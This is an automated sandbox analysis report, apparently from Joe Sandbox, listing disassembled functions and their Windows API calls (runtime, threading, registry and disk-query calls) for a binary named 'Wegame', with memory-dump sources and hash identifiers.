                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000210,?,00000000,00000021), ref: 6BD84614
                                                                  • Part of subcall function 6BD840E5: __EH_prolog3_GS.LIBCMT ref: 6BD840EF
                                                                  • Part of subcall function 6BD840E5: memset.VCRUNTIME140(?,00000000,00000100,00000394,6BD840AC,?,00000010,?), ref: 6BD84135
                                                                  • Part of subcall function 6BD840E5: __snprintf_s.LIBCMT ref: 6BD8414E
                                                                  • Part of subcall function 6BD840E5: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD8416B
                                                                  • Part of subcall function 6BD840E5: memset.VCRUNTIME140(?,00000000,0000022D,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD84192
                                                                  • Part of subcall function 6BD840E5: memmove.VCRUNTIME140(?,SCSIDISK), ref: 6BD841CD
                                                                  • Part of subcall function 6BD840E5: DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 6BD84200
                                                                  • Part of subcall function 6BD8477F: __EH_prolog3_GS.LIBCMT ref: 6BD84789
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,00000C68,6BD840C2,?,00000010,?), ref: 6BD847C3
                                                                  • Part of subcall function 6BD8477F: __snprintf_s.LIBCMT ref: 6BD847DC
                                                                  • Part of subcall function 6BD8477F: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD847F5
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,0000000C), ref: 6BD84818
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000800,?,00000000,0000000C), ref: 6BD84838
                                                                  • Part of subcall function 6BD8477F: DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000800,?,00000000), ref: 6BD84864
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010), ref: 6BD84880
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68), ref: 6BD84893
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,00000000,00000100), ref: 6BD848A6
                                                                  • Part of subcall function 6BD84304: __EH_prolog3_GS.LIBCMT ref: 6BD8430E
                                                                  • Part of subcall function 6BD84304: memset.VCRUNTIME140(?,00000000,00000100,0000017C,6BD840D8,?,00000010,?), ref: 6BD8434E
                                                                  • Part of subcall function 6BD84304: __snprintf_s.LIBCMT ref: 6BD84367
                                                                  • Part of subcall function 6BD84304: CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD84385
                                                                  • Part of subcall function 6BD84304: memset.VCRUNTIME140(?,00000000,00000018,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD843A8
                                                                  • Part of subcall function 6BD84304: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD843C9
                                                                  • Part of subcall function 6BD84304: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000221,?,?,?,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD843DC
                                                                  • Part of subcall function 6BD84304: DeviceIoControl.KERNEL32(00000000,0007C088,00000000,00000021,00000000,00000221,00000000,00000000), ref: 6BD84410
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ControlDeviceH_prolog3_$CreateFile__snprintf_s$Versionmallocmemmove
                                                                • String ID:
                                                                • API String ID: 3431448289-0
                                                                • Opcode ID: 3e7ec88691921245f298513f8452b98bc54f0ace8ce0bab8927019b67b0f1780
                                                                • Instruction ID: a146fd7b1d538ad43fe16f6ff8ee2215b42643edc29ff725c6c673498216be65
                                                                • Opcode Fuzzy Hash: 3e7ec88691921245f298513f8452b98bc54f0ace8ce0bab8927019b67b0f1780
                                                                • Instruction Fuzzy Hash: 82016D76E41218AECF215B608D05FCF7779AF57219F0440A0FA886B211D73A4B9D9F62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3A667 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3A66E
                                                                • ?rdstate@ios_base@std@@QBEHXZ.MSVCP140(?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004,6BD36B89,00000000,?,00000000), ref: 6BD3A69C
                                                                • OutputDebugStringW.KERNEL32(00000000,?,?,?,00000000), ref: 6BD3A6CC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?rdstate@ios_base@std@@DebugH_prolog3_OutputString
                                                                • String ID:
                                                                • API String ID: 3811627321-0
                                                                • Opcode ID: 64b1103a761cf376782d1df8b00ab8a520cdb1c4c1f250fbddffe072c1d91562
                                                                • Instruction ID: f3267aa001bc0775113e2442eabc9cc708d46fd9644a4979974f9a6bba0f5b79
                                                                • Opcode Fuzzy Hash: 64b1103a761cf376782d1df8b00ab8a520cdb1c4c1f250fbddffe072c1d91562
                                                                • Instruction Fuzzy Hash: 04019EB1A10204EFDF14DF78C949B9D77B9BF16335F145148E015AB2A1C738EA45CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE26000 Relevance: 4.5, APIs: 3, Instructions: 41threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6BE26060,?,00000004,0000002C,?,?,6BD2F6E9,00000030,6BD99E93,0000000C,6BD9A739,?), ref: 6BE26016
                                                                • CloseHandle.KERNEL32(?,00000003), ref: 6BE26042
                                                                • ResumeThread.KERNEL32(?,00000003), ref: 6BE26050
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleResumeThread_beginthreadex
                                                                • String ID:
                                                                • API String ID: 3482405168-0
                                                                • Opcode ID: 3d3fc118202f90ef8fbba2d8dcef509510d4b5660d09ef7eb44433fec99afaa4
                                                                • Instruction ID: 94a09b902688334745ca553821a268a7001bd072edb2dfc24b7d27c191163455
                                                                • Opcode Fuzzy Hash: 3d3fc118202f90ef8fbba2d8dcef509510d4b5660d09ef7eb44433fec99afaa4
                                                                • Instruction Fuzzy Hash: 71F06275240201AFD7349F58CC84F91B3A8FF49329F34065AF555C7261C774E896AB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044EEAC Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0044EEB3
                                                                • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00000008,004435D8,?,?,?,00000000), ref: 0044EEC9
                                                                  • Part of subcall function 0044C792: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 0044C7AA
                                                                  • Part of subcall function 0044C792: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 0044C7CD
                                                                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?), ref: 0044EEE5
                                                                  • Part of subcall function 0044307F: __EH_prolog3.LIBCMT ref: 00443086
                                                                  • Part of subcall function 0044307F: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,00000000,00000000,00000000,00441B02,00000000,0000001C,?), ref: 00443091
                                                                  • Part of subcall function 0044307F: ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 004430A8
                                                                  • Part of subcall function 0044307F: std::locale::_Getfacet.LIBCPMT ref: 004430B2
                                                                  • Part of subcall function 0044307F: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 004430CB
                                                                  • Part of subcall function 0044307F: std::_Facet_Register.LIBCPMT ref: 004430E3
                                                                  • Part of subcall function 0044307F: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 00443106
                                                                  • Part of subcall function 0044C80E: ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 0044C81A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@H_prolog3Lockit@std@@U?$char_traits@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@GetfacetInit@?$basic_streambuf@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 3501216582-0
                                                                • Opcode ID: 01b4c0ed2303a7b9bc590f0a1c18b89dccbd681e56cdcefb88922e59d0300079
                                                                • Instruction ID: a37d1029a67bed018df111d64b7bf293028740fc1517e30bfcc3b7fe7b77a420
                                                                • Opcode Fuzzy Hash: 01b4c0ed2303a7b9bc590f0a1c18b89dccbd681e56cdcefb88922e59d0300079
                                                                • Instruction Fuzzy Hash: CFF0C230600614EBEF10AB638D0ABAE7666AF00714F00442EB905A6192DF78CE058B5E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3A5BC Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3A5C3
                                                                • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(00000008,?,?,00000008,6BD44945,00000008,?,?,00000000), ref: 6BD3A5D9
                                                                  • Part of subcall function 6BD38985: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,00000000,?,?,6BD3641C,00000008,00000000), ref: 6BD3899D
                                                                  • Part of subcall function 6BD38985: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,?,00000000,?,?,6BD3641C,00000008,00000000), ref: 6BD389C0
                                                                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(0000000F,00000000,00000001,?,?,?), ref: 6BD3A5F5
                                                                  • Part of subcall function 6BD34C73: __EH_prolog3.LIBCMT ref: 6BD34C7A
                                                                  • Part of subcall function 6BD34C73: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD3A605,00000000,?,?,?), ref: 6BD34C85
                                                                  • Part of subcall function 6BD34C73: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?), ref: 6BD34C9C
                                                                  • Part of subcall function 6BD34C73: std::locale::_Getfacet.LIBCPMT ref: 6BD34CA6
                                                                  • Part of subcall function 6BD34C73: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000,?,?,?), ref: 6BD34CBF
                                                                  • Part of subcall function 6BD34C73: std::_Facet_Register.LIBCPMT ref: 6BD34CD7
                                                                  • Part of subcall function 6BD34C73: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?), ref: 6BD34CFA
                                                                  • Part of subcall function 6BD38A01: ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140(?,?,?,6BD3A60E,00000000,?,?,?), ref: 6BD38A0D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@H_prolog3Lockit@std@@U?$char_traits@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@GetfacetInit@?$basic_streambuf@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 3501216582-0
                                                                • Opcode ID: 2cd8857c4b6c1378f3128ca585c0c921b8c54637c7b68c3045b9cfd06c26c9d9
                                                                • Instruction ID: ef5eb0525722792fe48809b433be40f08211f1efec38faa5fde113042208da5d
                                                                • Opcode Fuzzy Hash: 2cd8857c4b6c1378f3128ca585c0c921b8c54637c7b68c3045b9cfd06c26c9d9
                                                                • Instruction Fuzzy Hash: FFF0F070A60628ABCF15DB70CD0ABAE7B656F11724F204028E410EE1E1DFBECB10DB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD95262 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD95269
                                                                • ??0Qos@qos@adapt_for_imports@ierd_tgp@@QAE@XZ.COMMON(00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952B2
                                                                • __Init_thread_footer.LIBCMT ref: 6BD952C6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3Init_thread_footerQos@qos@adapt_for_imports@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 3158337806-0
                                                                • Opcode ID: fcb9e76df0eaacaa52274898a0354568d3a416883a421b37102b961d3f764646
                                                                • Instruction ID: f74bef89a3444b3faebcc10badfa02525fcccdd6a8b8d66c0e71c20c0e5e7359
                                                                • Opcode Fuzzy Hash: fcb9e76df0eaacaa52274898a0354568d3a416883a421b37102b961d3f764646
                                                                • Instruction Fuzzy Hash: 68F0B431A045108FEB15EB789546B2C3361BB02739F35115CD2215F2D0CF3D5902AA52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00452C55 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: 19d0a513e890d1298bb3f9cd22b1c4cf47e648bacaeee32eadc12912e2791a36
                                                                • Instruction ID: cbd9f979754a8c3311bbb19cc064fb6db02c9b56d71ae4bdf38ad7607f4c9579
                                                                • Opcode Fuzzy Hash: 19d0a513e890d1298bb3f9cd22b1c4cf47e648bacaeee32eadc12912e2791a36
                                                                • Instruction Fuzzy Hash: FF418331700204DBCF24DF54CA91CAE77B2EF89711F24402FD901BB692D7B4A989CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD96690 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9669A
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                  • Part of subcall function 6BD981C2: memset.VCRUNTIME140(00000002,00000000,00000080,?,?,?,6BD98138,?,?,0000002C,6BD95437,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD981D7
                                                                  • Part of subcall function 6BD981C2: memmove.VCRUNTIME140(00000002,00000000,00000080,00000002,00000000,?), ref: 6BD981F9
                                                                Strings
                                                                • %s#%d#%llu#%s#%llu#%s#%s#%llu, xrefs: 6BD966A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$memmovememset
                                                                • String ID: %s#%d#%llu#%s#%llu#%s#%s#%llu
                                                                • API String ID: 221172491-2678914559
                                                                • Opcode ID: 813008d92d41a55a0a0fe9e7304c70ec321a974167e5ac1003f0c534796f4f4c
                                                                • Instruction ID: 62954816e50003be10e0edbcaecc7ebb704f4a0ce0c40701f56cbabd5d927997
                                                                • Opcode Fuzzy Hash: 813008d92d41a55a0a0fe9e7304c70ec321a974167e5ac1003f0c534796f4f4c
                                                                • Instruction Fuzzy Hash: BD1100B2810645AADB18D7B0CC5AEEE736CEB14228F540A5CA2565B090FF7CBB05C774
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00450F32 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: 4f2cd4c0d0d9d157585a0e6310de1ab4c1c42d907215eca07693cfd48ff219e3
                                                                • Instruction ID: dc17b2759417b91f14c375007d5bca3b47606cbb3e4c912de54a07edec8761fb
                                                                • Opcode Fuzzy Hash: 4f2cd4c0d0d9d157585a0e6310de1ab4c1c42d907215eca07693cfd48ff219e3
                                                                • Instruction Fuzzy Hash: 69012970900248DFCB14DFAAC58159DBBB0BF08318F60416FE009EB292D7745A45CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD8F7A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD8F7A7
                                                                  • Part of subcall function 6BD8F960: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 6BD8F987
                                                                  • Part of subcall function 6BD8F960: RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BD8F9A4
                                                                  • Part of subcall function 6BD8F960: RegCloseKey.KERNEL32(?), ref: 6BD8F9AF
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseH_prolog3OpenQueryValuemalloc
                                                                • String ID: Root
                                                                • API String ID: 248731187-3066451557
